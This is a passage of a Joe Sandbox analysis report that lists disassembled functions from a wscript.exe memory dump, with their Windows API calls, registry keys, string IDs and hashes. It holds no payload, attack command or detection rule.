                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000A2C,00000000,0058B25F,?), ref: 0058B774
                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000A2C,00000000,0058B25F,?), ref: 0058B783
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$Local$AllocFormatFreeMessage$ErrorLastString__alloca_probe_16
                                                                                                                                                                                                                      • String ID: $:X
                                                                                                                                                                                                                      • API String ID: 4105800338-2149331089
                                                                                                                                                                                                                      • Opcode ID: 8763a3922d10b1ec2ba7804a225cc886fbad880ed4ea0bc2bb0c18d6fce6c57f
                                                                                                                                                                                                                      • Instruction ID: 64a190a3ba316fe1bd6142c9ed6b4b66be1edf7d3b3a6ce328a5f4680690d0c4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8763a3922d10b1ec2ba7804a225cc886fbad880ed4ea0bc2bb0c18d6fce6c57f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18414F75901626BBEF215B6A8C4CEEF7F7CFF46361F15412AB815E21A0DB308904DBA4
                                                                                                                                                                                                                      Function 0058A46F Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(0zX,00000000,-00000001,0zX,005810C4), ref: 0058A4A1
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0058A4AD
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0058A4C1
                                                                                                                                                                                                                      • GetFileVersionInfoW.VERSION(0zX,00000000,00000000), ref: 0058A4CE
                                                                                                                                                                                                                      • VerQueryValueW.VERSION(?,00583BE0,?,00000001), ref: 0058A4E6
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0zX,000000FF,00000000,00000000,00000000,00000000,-00000001,0zX,005810C4), ref: 0058A522
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0058A532
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0zX,000000FF,?,00000000,00000000,00000000), ref: 0058A54F
                                                                                                                                                                                                                      • GetFileVersionInfoSizeA.VERSION(?,00000000,?,00000000,00000000,00000000), ref: 0058A562
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0058A572
                                                                                                                                                                                                                      • GetFileVersionInfoA.VERSION(?,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000), ref: 0058A57F
                                                                                                                                                                                                                      • VerQueryValueA.VERSION(?,00583BE4,?,00000001,?,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000), ref: 0058A59B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileInfoVersion$__alloca_probe_16$ByteCharMultiQuerySizeValueWide$ErrorLast
                                                                                                                                                                                                                      • String ID: 0zX
                                                                                                                                                                                                                      • API String ID: 467288509-1800041528
                                                                                                                                                                                                                      • Opcode ID: 25e4dc5a4c91e2d0f73c5bbf0642adcea967eb17bf606422c61a6cfa53d33fab
                                                                                                                                                                                                                      • Instruction ID: 21d26cab36f54b08bd96be50aec66402940a2f45440a7cd31e0e3b40fcc456c5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25e4dc5a4c91e2d0f73c5bbf0642adcea967eb17bf606422c61a6cfa53d33fab
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E316BB5600215BFAF11ABA9DC48DBB7FBCFF49320711012AB812E7250DA71DD0497B2
                                                                                                                                                                                                                      Function 00594153 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 225memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0059792D: malloc.MSVCRT ref: 00597945
                                                                                                                                                                                                                      • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 005941EA
                                                                                                                                                                                                                      • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00594209
                                                                                                                                                                                                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 005942B3
                                                                                                                                                                                                                      • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 005942CF
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 005942DB
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0059431F
                                                                                                                                                                                                                      • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 00594343
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0059434F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ArraySafe$AllocClearCreateElementStringVariant$malloc
                                                                                                                                                                                                                      • String ID: (=X
                                                                                                                                                                                                                      • API String ID: 2320673430-3326566194
                                                                                                                                                                                                                      • Opcode ID: d24be73f8f9e19e4907a481c64218390df2f4452401685b9dc1e5d9e052a93c2
                                                                                                                                                                                                                      • Instruction ID: ce455efd502f3da18649ed9e10027cb12be2bf075dd39c701751fb9028c09697
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d24be73f8f9e19e4907a481c64218390df2f4452401685b9dc1e5d9e052a93c2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84718C75A0021A9BDF14DFA9D884ABEBBF4FF58710F51452AE901EB290DB709D82CF40
                                                                                                                                                                                                                      Function 00595C39 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 168registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,Enabled,00000000,?,?,?,00000000,00000000,Enabled), ref: 00595C99
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Enabled,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,Enabled), ref: 00595CE0
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00595CEC
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00595CF6
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Enabled,000000FF,?,00000000,00000000,00000000), ref: 00595D0E
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,00000000,00000000,Enabled), ref: 00595D4E
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000400), ref: 00595DB2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$QueryValue$ErrorLast__alloca_probe_16
                                                                                                                                                                                                                      • String ID: Enabled$false
                                                                                                                                                                                                                      • API String ID: 421531244-109718029
                                                                                                                                                                                                                      • Opcode ID: 255c8f3bc97b037d1cac85cd4d9e02d600cf0c3041695ce3652b3ce0255cf745
                                                                                                                                                                                                                      • Instruction ID: 4d0fb96687779658919494d27b36ce09be11d94af07db16ecd4f7cafb7d54653
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 255c8f3bc97b037d1cac85cd4d9e02d600cf0c3041695ce3652b3ce0255cf745
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D51A7B05046159AEF25CB29CC48EBB7B79FB91310F2087A9B516D2190FF309E94CF60
                                                                                                                                                                                                                      Function 0058FD12 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75windowregistryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClassInfoA.USER32(00000000,WSH-Timer,?), ref: 0058FD34
                                                                                                                                                                                                                      • RegisterClassA.USER32(?), ref: 0058FD60
                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 0058FD6E
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0058FD74
                                                                                                                                                                                                                      • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000001,00000001,00000000,00000000,?), ref: 0058FD94
                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 0058FDA6
                                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 0058FDB7
                                                                                                                                                                                                                      • GetMessageA.USER32(?,?,00000000,00000000), ref: 0058FDC5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClassEventMessage$CreateDispatchErrorInfoLastRegisterWindow
                                                                                                                                                                                                                      • String ID: WSH-Timer
                                                                                                                                                                                                                      • API String ID: 2425405920-2323048385
                                                                                                                                                                                                                      • Opcode ID: 7feb2e27b60e9bee1a3fac9a35caa79ba6bb73585e32d00692bf7b3eb9f8965b
                                                                                                                                                                                                                      • Instruction ID: 9b4303cf8ec33fd8cfa626f2dd998f4fdbbe777f504d58b27b3ff8be0ec875d9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7feb2e27b60e9bee1a3fac9a35caa79ba6bb73585e32d00692bf7b3eb9f8965b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 982127B4800209ABDF209FAADC48CEFBFB8FF98710B14452EF911A2260D7749805DB60
                                                                                                                                                                                                                      Function 0058A6D7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 75registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000000,WSFFile,00000000,0002001F,00000000,0zX,00000000,?,0058A8DE,00000000), ref: 0058A6FA
                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(00000000,Scriptuser,00000000,00020019,0058A8DE,Open2,?,0058A8DE,00000000), ref: 0058A71C
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(0058A8DE,?,0058A8DE,00000000), ref: 0058A72B
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,0058A8DE,00000000), ref: 0058A773
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseOpen
                                                                                                                                                                                                                      • String ID: 0zX$Open2$Scriptuser$Shell$WSFFile
                                                                                                                                                                                                                      • API String ID: 47109696-2659566962
                                                                                                                                                                                                                      • Opcode ID: acfc74d0e70c7efe8ce95607784d5c0bcd9424b63c35d3bbbe115cd70b7e8801
                                                                                                                                                                                                                      • Instruction ID: 5ba603e0cae66ae29df579b98df3fd24c2a53605b15f11605369833be3c73a53
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: acfc74d0e70c7efe8ce95607784d5c0bcd9424b63c35d3bbbe115cd70b7e8801
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2911B736A01114ABAB22A6688C45A6E7F79FB80790B25412BFC05F7200DA348D05B791
                                                                                                                                                                                                                      Function 0058CA7F Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 132libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,WinVerifyTrust), ref: 0058CB63
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0058CB6F
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0058CBC3
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,00000000,005810C4,00000000), ref: 0058CBE1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$AddressFreeLibraryProc
                                                                                                                                                                                                                      • String ID: ($4$WinVerifyTrust$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 1171437518-2532474036
                                                                                                                                                                                                                      • Opcode ID: eea663dd748fbe2ec21162f17d8e55b53f07f4877a3567f03847122635444557
                                                                                                                                                                                                                      • Instruction ID: d50f1efb49de28781c6174151f72f3e86c1b22f2f8751329d298e89487b5f331
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eea663dd748fbe2ec21162f17d8e55b53f07f4877a3567f03847122635444557
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F4119B6D016298FCB10DFA9C8856AEBFB0BF48711F51422EED15BB340D7789D058BA0
                                                                                                                                                                                                                      Function 00591610 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 005951D4: GetProcessHeap.KERNEL32(00000000,00000038,00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 005951E5
                                                                                                                                                                                                                        • Part of subcall function 005951D4: HeapFree.KERNEL32(00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 005951EC
                                                                                                                                                                                                                        • Part of subcall function 005951D4: GetProcessHeap.KERNEL32(00000000,005810C4,00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 0059520B
                                                                                                                                                                                                                        • Part of subcall function 005951D4: HeapAlloc.KERNEL32(00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 00595212
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0059166E
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00591679
                                                                                                                                                                                                                      • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 0059168A
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(null), ref: 005916B1
                                                                                                                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 005916D6
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0059176B
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00591776
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Variant$ClearHeap$AllocProcess$ArrayChangeElementFreeSafeStringType
                                                                                                                                                                                                                      • String ID: null
                                                                                                                                                                                                                      • API String ID: 2181487673-634125391
                                                                                                                                                                                                                      • Opcode ID: a0913428d737321c458801f8166c632cb5110c57a21fbc6095900b5003e69efa
                                                                                                                                                                                                                      • Instruction ID: 846604023d4a016059758f5e06b1ab5b3c3c1ad1bf9c80adf3ea01f9ef437fc5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0913428d737321c458801f8166c632cb5110c57a21fbc6095900b5003e69efa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67418F769047639BCB01DFA4D98496ABBE8FF88B50F450A2EF941D7250EB30D904C796
                                                                                                                                                                                                                      Function 00591C00 Relevance: 13.8, APIs: 9, Instructions: 341memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00591CD0
                                                                                                                                                                                                                      • wcscpy_s.MSVCRT ref: 00591CEC
                                                                                                                                                                                                                      • wcscat_s.MSVCRT ref: 00591CF9
                                                                                                                                                                                                                      • SetErrorInfo.OLEAUT32(00000000,00000000), ref: 00591EB3
                                                                                                                                                                                                                        • Part of subcall function 0059792D: malloc.MSVCRT ref: 00597945
                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00591E10
                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00591E43
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00591F0C
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 00591F3E
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00591F4C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: StringVariant$Free$AllocClearCopyErrorInfoInitmallocwcscat_swcscpy_s
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3780719979-0
                                                                                                                                                                                                                      • Opcode ID: 7916008eda9c6d95cfa14d678deddc31980e1dcc25584f6b6f06c3b29a84e705
                                                                                                                                                                                                                      • Instruction ID: 3d7946f2592320ef1a3835eefc7bf777e247184dea70ac64eaaf483a3fc343ea
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7916008eda9c6d95cfa14d678deddc31980e1dcc25584f6b6f06c3b29a84e705
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35C18D75E0062AAFCF14CF98D884AAEBFB5FF48710F25456AE905AB350D730AD41CB94
                                                                                                                                                                                                                      Function 005950BE Relevance: 13.6, APIs: 9, Instructions: 102COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00592AFB,00000104,?,?,00000104,?,?,?,?,?), ref: 005950EC
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 005950FA
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00592AFB,000000FF,00000000,00000000,00000000,00000000,00000104,?,?,?,?,?), ref: 00595121
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0059512D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharErrorFullLastMultiNamePathWide__alloca_probe_16
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 187176378-0
                                                                                                                                                                                                                      • Opcode ID: cc522d97b1228261820925ce9cd1fe6bd72a89346dce72667fa42a345af69d35
                                                                                                                                                                                                                      • Instruction ID: 1a2736dda38ca7d85421c5025d64ff1e1891b8889159fb4c6dc6ba1541e708ee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc522d97b1228261820925ce9cd1fe6bd72a89346dce72667fa42a345af69d35
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F310635601526BB9F225F6A8C4CEAB7F6CFF86364B01411AB919D6250DA308E05D7F0
                                                                                                                                                                                                                      Function 00589456 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 262memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 005897B0
                                                                                                                                                                                                                        • Part of subcall function 005899DC: CoCreateInstance.OLE32(00583980,00000000,00000017,00583BD0,p4Y,00000000,005810C4,00000001,005810C4,?,005894CB,-00000001,0zX), ref: 00589A0A
                                                                                                                                                                                                                        • Part of subcall function 0058FDD5: GetCurrentThreadId.KERNEL32 ref: 0058FE04
                                                                                                                                                                                                                        • Part of subcall function 005950BE: GetFullPathNameW.KERNEL32(00592AFB,00000104,?,?,00000104,?,?,?,?,?), ref: 005950EC
                                                                                                                                                                                                                        • Part of subcall function 005950BE: GetLastError.KERNEL32 ref: 005950FA
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00589534
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00589554
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Alloc$CreateCurrentErrorFreeFullInstanceLastNamePathThread
                                                                                                                                                                                                                      • String ID: .wsf$0zX
                                                                                                                                                                                                                      • API String ID: 1820159607-2156800361
                                                                                                                                                                                                                      • Opcode ID: f652ab40085e2da85ba4863c06ca3cc8fa84db34200fa118e9b8773dfd54e264
                                                                                                                                                                                                                      • Instruction ID: 9ffc76ca84c99edda2fe39645fe3000462a5f95beaa66d05ceb598c688b1b98e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f652ab40085e2da85ba4863c06ca3cc8fa84db34200fa118e9b8773dfd54e264
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C91A3707002169BDB20BF69D898BBE7BE9BF99304F180069E905F7251EA34AD458B90
                                                                                                                                                                                                                      Function 0058F040 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 246COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058F2AB
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058F2B4
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058F2BD
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058F2C6
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058F2CF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeString
                                                                                                                                                                                                                      • String ID: WScript_OnScriptTerminate$d@X
                                                                                                                                                                                                                      • API String ID: 3341692771-2954595149
                                                                                                                                                                                                                      • Opcode ID: d4716902e2d20ec83c8bdb15bd4bfdcc457b9629f35325eb69bbf45f528fa9a6
                                                                                                                                                                                                                      • Instruction ID: ac9391b6b9f32c5b93387600f5d780fcfb44caa42072f913119b7519dc5c3f47
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4716902e2d20ec83c8bdb15bd4bfdcc457b9629f35325eb69bbf45f528fa9a6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23915D75A10205AFDB14EF98DC99AAE7BB6FF8C300F15016DEA02A7391DB30AD45CB54
                                                                                                                                                                                                                      Function 0058BCC8 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 107registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00595846: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,00588FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,0058BB74,?,00000000,?,00000000), ref: 00595873
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000000,-00000001,0zX,005810C4), ref: 0058BDC4
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,-00000001,0zX,005810C4), ref: 0058BDD2
                                                                                                                                                                                                                        • Part of subcall function 00595C39: RegQueryValueExW.ADVAPI32(00000000,Enabled,00000000,?,?,?,00000000,00000000,Enabled), ref: 00595C99
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close$OpenQueryValue
                                                                                                                                                                                                                      • String ID: 0zX$IgnoreUserSettings$Software\Microsoft\Windows Script Host\Settings$TrustPolicy$UseWINSAFER
                                                                                                                                                                                                                      • API String ID: 1607946009-882304179
                                                                                                                                                                                                                      • Opcode ID: ebb8c365e94966333767a69a21d49b44791b7a2c093aec07a6fb3825f374eca8
                                                                                                                                                                                                                      • Instruction ID: cb4518a703237d6f5db6119e8c648142cc23a6a2e969935be052d7029789ed92
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebb8c365e94966333767a69a21d49b44791b7a2c093aec07a6fb3825f374eca8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95315B74B0224ABBEF14EAA58495BEFBFBDBF95300B4840A99C41B7241D735EE058760
                                                                                                                                                                                                                      Function 00595846 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,00588FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,0058BB74,?,00000000,?,00000000), ref: 00595873
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,0058BB74), ref: 0059589D
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,0058BB74,?,00000000,?,00000000,?,?,?,00588FB7,00000000,00000000), ref: 005958AA
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 005958B4
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,0058BB74,?,00000000,?,00000000), ref: 005958C8
                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00588FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,0058BB74,?,00000000,?,00000000), ref: 005958DF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiOpenWide$ErrorLast__alloca_probe_16
                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows Script Host\Settings
                                                                                                                                                                                                                      • API String ID: 2927149995-2126348837
